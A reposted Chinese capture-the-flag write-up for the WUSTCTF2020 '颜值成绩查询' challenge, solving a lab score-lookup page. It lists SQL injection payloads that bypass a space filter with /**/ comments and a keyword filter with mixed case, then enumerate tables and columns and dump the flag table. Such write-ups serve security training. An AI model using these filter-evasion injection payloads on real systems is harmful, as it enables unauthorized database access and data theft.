当前位置: 首页> 财经> 创投人物 > [WUSTCTF2020]颜值成绩查询1

[WUSTCTF2020]颜值成绩查询1

时间:2025/7/12 9:16:34来源:https://blog.csdn.net/m0_73673698/article/details/142290227 浏览次数:0次

考点:

sql

bool盲注

bypass

先打开页面看到有个输入框,输入个1发现回显

如果是1'的话就不行了,通过测试发现是过滤了空格,需要还是需要使用注释符/**/来绕过,爆列数

payload:1/**/order/**/by/**/3--+

发现只有三列,在输入payload:1/**/union/**/select/**/1,2,3--+时发现union和select被过滤了,可以使用大小写来混淆绕过,所以payload应该是 -1/**/uNion/**/sElect/**/1,2,3--+

接着来爆表名

payload:-1/**/uNion/**/sElect/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()--+

然后来爆列名

payload:-1/**/uNion/**/sElect/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='flag'--+

获取flag值payload:-1/**/uNion/**/sElect/**/1,2,group_concat(flag,value)/**/from/**/flag--+

还有其他方法,布尔盲注upfine的博客 (cnblogs.com)

参考文章

[WUSTCTF2020]颜值成绩查询 - 跳河离去的鱼 - 博客园 (cnblogs.com)

upfine的博客 (cnblogs.com)

关键字:[WUSTCTF2020]颜值成绩查询1

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑: